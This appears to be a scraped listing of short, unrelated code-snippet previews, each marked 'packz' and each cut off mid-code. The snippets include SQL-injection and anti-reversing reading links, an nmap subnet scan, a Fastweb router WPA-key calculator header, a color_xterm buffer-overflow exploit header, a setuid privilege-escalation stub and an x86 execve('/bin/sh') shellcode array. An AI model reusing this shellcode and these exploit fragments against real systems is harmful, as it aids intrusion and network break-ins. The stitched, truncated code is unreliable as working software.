packz

$ make ARCH=arm CROSS_COMPILE=/opt/android-ndk-r5c/toolchains/arm-linux-androideabi-4.4.3/prebuilt/linux-x86/bin/arm-linux-androideabi-

$ make ARCH=arm CROSS_COMPILE=$TOOLCHAIN_PATH/$PREFIX -C /opt/samsung-kernel-aries/ M=$PWD

packz

• Advanced SQLi exploitation with FILE_PRIV
• SQL injection by blackhat academy
• Creating Backdoors Using SQL Injection
• False SQL Injection and Advanced Blind SQL Injection
• https://www.pentesterlab.com/from_sqli_to_shell.html
• http://blog.y-shahinzadeh.ir/2012/07/bypassing-mysql_real_escape_string-and-magic_quotes_gpc/
• http://ceriksen.com/2013/01/27/vulnerability-chaining-magic-quotes-bypass-with-hexadecimal-literals-and-data-exfiltration/

packz

METASPLOIT

• http://www.offensive-security.com/metasploit-unleashed/

  $ nmap -v -sV 192.168.0.0/24

PENETRATION TEST

packz

/*
 *
 * Implementazione dello script originariamente al seguente URL
 *
 * 	http://www.evilsocket.net
 * 		/1126/script-per-il-calcolo-della-chiave-wpa-nei-router-fastweb-pirelli.html
 *
 * 	http://wifiresearchers.wordpress.com/
 *
 *

packz

#include<stdio.h>
#include<stdlib.h>

void print_key(char p[], int f) {
	printf("key: ");
	int cycle;
	for (cycle = 0 ; cycle < 8 ; cycle++) {
		printf("%c", p[cycle]);
	}

packz

• http://jbremer.org/x86-api-hooking-demystified/
• http://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide
• http://blog.praty.net/?p=235
• https://github.com/RC1140/hackfortress
• Very goods tricks to avoid reversing by the author of a challenge.
• Antidebug trick using constructor.
• http://radare.org/get/rootedlabs2013-radare.pdf
• http://www.ropshell.com/peda/
• http://pythonarsenal.erpscan.com/
• http://code.google.com/p/idapathfinder/

packz

/*
 * color_xterm buffer overflow exploit for Linux with non-executable stack
 * Copyright (c) 1997 by Solar Designer
 *
 * Compile:
 * gcc cx.c -o cx -L/usr/X11/lib \
 * `ldd /usr/X11/bin/color_xterm | sed -e s/^.lib/-l/ -e s/\\\.so.\\\+//`
 *
 * Run:
 * $ ./cx

packz

/*
 * [qnix:/0x80]$ ls -la getroot password
 * -r-sr-x--- 1 root qnix 8966 2012-01-11 17:32 getroot
 * -r-------- 1 root root   11 2012-01-11 15:00 password
 */

#include<unistd.h>
#include<stdlib.h>
#include<stdio.h>
 

packz

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include "shellcode.h"

int main(int argc, char* argv[]) {
	if (argc < 2) {
		fprintf(stderr, "usage: %s <command> <arg1> ...\n", argv[0]);
		return 1;
	}

packz

#include<stdio.h>
#include<string.h>


#if 0
char SC[] =   "\xeb\x1d\x5b\x31\xc0\x67\x89\x43\x07\x67\x89\x5b\x08\x67\x89\x43\x0c"
              "\x31\xc0\xb0\x0b\x67\x8d\x4b\x08\x67\x8d\x53\x0c\xcd\x80\xe8\xde\xff"
              "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42"
              "\x42";
#else